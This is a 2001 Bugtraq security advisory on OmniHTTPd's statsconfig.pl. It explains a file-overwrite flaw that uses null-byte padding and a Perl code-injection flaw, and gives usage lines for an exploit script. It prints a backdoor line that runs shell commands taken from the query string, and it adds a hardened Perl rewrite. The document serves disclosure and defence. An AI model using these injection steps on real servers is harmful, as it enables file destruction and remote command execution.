Vulnerabilities in OmniHTTPd default installation
daemon@ATHENA.MIT.EDU (joetesta@HUSHMAIL.COM)
Tue Jan 16 14:09:22 2001
Message-ID: <200101152215.OAA04869@user7.hushmail.com>
Date: Mon, 15 Jan 2001 17:19:12 -0800
Reply-To: joetesta@HUSHMAIL.COM
From: joetesta@HUSHMAIL.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Vulnerabilities in OmniHTTPd default installation
Overview
Two vulnerabilities exist within the 'statsconfig.pl' script that
comes with OmniHTTPd v2.07 and is installed by default. The first
allows a remote attacker to corrupt any file in the system. The second
allows arbitrary code to be inserted into '/cgi-bin/stats.pl'.
Details
Here is the offending code:
    if ($FORM{'mostbrowsers'}) {
        $mostbrowsers_str = '$most_browsers = "' .
            $FORM{'mostbrowsers'} . '";';
    }
    ...
    unless (-f "$FORM{'cgidir'}/stats.prg") {
        $error .= "<LI>Config couldn't find the file stats.prg in
    your cgi-bin directory.";
        [ exit(); ]
    }
    ...
    $cgifile = "$FORM{'cgidir'}/stats.pl";
    $progfile = "$FORM{'cgidir'}/stats.prg";
    open(CGI, "> $cgifile");
    open(PROG, "$progfile");
    print CGI "#!/usr/local/bin/perl5\n";
    print CGI "#AutoConfiged by Statsconfig.pl\n\n";
    print CGI "$deflimit_str\n$mostip_str\n$mostreq_str\n$mostbrowsers_str\n$timelog_str\n$mostipnum_str\n$mostreqf_str\n$mostbrowsernum_str\n$logloc_str\n$imagebar_str\n$serveradd_str\n$barwidth_str\n$barheight_str\n$listpass_str\n$bgcolor_str\n$bgimage_str\n$ttBGcolor_str\n\n$perllib_str\n";
...
None of the variables in %FORM are filtered. An attacker simply
sets $FORM{'cgidir'} to the absolute path of any file in the system
(padded with a null, of course), and that file will be corrupted. Note
that because absolute file names are used, this exploit is not
restricted to the drive the webserver resides on.
Code injection is achieved by setting $FORM{'mostbrowsers'} to any
legal value, followed by a semicolon and the payload.
Exploit
I've written an exploit in PERL to demonstrate the two vulnerabilities.
To corrupt a file:
perl omnismash.pl localhost 80 -corrupt c:/autoexec.bak
The file you choose will be overwritten with approximately 470
bytes of PERL code.
To inject code into '/cgi-bin/stats.pl':
perl omnismash.pl localhost 80 -inject c:/httpd/cgi-bin
You must pass the absolute path to the cgi-bin directory for this
to work. This exploit is hard-coded to insert the following line:
if( $ENV{'QUERY_STRING'} ) { open( QS,$ENV{'QUERY_STRING'} ); }
With that done, point your browser to
'http://localhost/cgi-bin/stats.pl?|dir'. You will see a directory
listing of '/cgi-bin'.
Solution
Erase 'statsconfig.pl' along with any other unnecessary files in your
'cgi-bin'. If this is not possible in your particular situation,
replace your current 'statsconfig.pl' file with the attached
'statsconfig.fixed' file. This version allows 'statsconfig.pl' to be
invoked only from localhost.
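The following is an added illustration of how the two steps quoted under Details can be hardened, together with the localhost restriction described under Solution. It is not the attached statsconfig.fixed and not OmniHTTPd code; it was written for this edit. The configured directory C:/httpd/cgi-bin (the path used in the Exploit section) and the treatment of mostbrowsers as a small integer count are assumptions made for the example.

```perl
#!/usr/bin/perl
# Hardened re-implementation of the two unsafe steps in statsconfig.pl.
# Illustrative code added for this edit; NOT OmniHTTPd's statsconfig.fixed.
use strict;
use warnings;
use File::Spec;

# Only the CGI directory the administrator configured may be written to.
# Assumed value for illustration; adjust to the real install path.
my $ALLOWED_CGIDIR = File::Spec->canonpath('C:/httpd/cgi-bin');

# Mirrors the intent of the attached fix: refuse requests that did not
# originate on the local machine.
sub from_localhost {
    my ($remote_addr) = @_;
    return defined $remote_addr && $remote_addr =~ /^(?:127\.0\.0\.1|::1)$/;
}

# The original uses $FORM{'cgidir'} verbatim, so a value such as
# "c:/autoexec.bak\0" becomes the target of open(CGI, "> $cgifile").
# Here the value must be a NUL-free, traversal-free path that
# canonicalises to the single configured directory.
sub validate_cgidir {
    my ($dir) = @_;
    return undef unless defined $dir;
    return undef if $dir =~ /\0/;                         # NUL truncates C paths
    return undef if $dir =~ /(^|[\\\/])\.\.([\\\/]|$)/;   # parent-dir traversal
    my $canon = File::Spec->canonpath($dir);
    return lc($canon) eq lc($ALLOWED_CGIDIR) ? $canon : undef;
}

# The original splices $FORM{'mostbrowsers'} into Perl source inside double
# quotes, so anything after a closing quote and semicolon runs when stats.pl
# is executed. Restrict the value to what the setting can legitimately be
# (assumed: a small integer) and emit it as a single-quoted literal in which
# only backslash and apostrophe are special, both escaped.
sub perl_string_literal {
    my ($s) = @_;
    $s =~ s/([\\'])/\\$1/g;
    return "'$s'";
}

sub mostbrowsers_line {
    my ($value) = @_;
    return undef unless defined $value && $value =~ /^\d{1,3}$/;
    return '$most_browsers = ' . perl_string_literal($value) . ';';
}

# Build the generated stats.pl path and body. Returns (undef, $reason) when
# either field is rejected, so nothing is written on bad input.
sub build_stats_config {
    my (%form) = @_;
    my $cgidir = validate_cgidir($form{'cgidir'});
    return (undef, "cgidir is not the configured cgi-bin directory")
        unless defined $cgidir;

    my $mb = mostbrowsers_line($form{'mostbrowsers'});
    return (undef, "mostbrowsers must be a small positive integer")
        unless defined $mb;

    my $cgifile = File::Spec->catfile($cgidir, 'stats.pl');
    my $body = "#!/usr/local/bin/perl5\n#AutoConfiged by Statsconfig.pl\n\n$mb\n";
    return ($cgifile, $body);
}

# Script entry point: only the named form fields are ever read; nothing else
# from the request is interpolated anywhere.
if (!caller) {
    exit 1 unless from_localhost($ENV{REMOTE_ADDR});
    # Constructed sample input standing in for the parsed CGI form.
    my %form = (cgidir => 'C:/httpd/cgi-bin', mostbrowsers => '10');
    my ($path, $out) = build_stats_config(%form);
    die "rejected: $out\n" unless defined $path;
    # Three-argument open with an explicit mode; the validated path cannot
    # smuggle a mode character or redirect the write elsewhere.
    open(my $cgi, '>', $path) or die "cannot write $path: $!";
    print $cgi $out;
    close $cgi;
}
```

The two changes that matter are that the output path is compared against one configured directory after canonicalisation rather than taken from the request, and that the user-supplied setting is both range-checked and written as an escaped literal instead of being pasted into source text. The REMOTE_ADDR check reproduces the mitigation the advisory's fixed file applies, but it is a stopgap; the validation is what removes the defects.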
Vendor Status
Omnicron Technologies Corporation was notified via
<info@omnicron.ab.ca> and <support@omnicron.ab.ca> on Monday,
January 8, 2001. No reply was received.
[Attachment: 2000.01.08.OmniHTTPd.zip (application/zip, base64-encoded; contents not reproduced here)]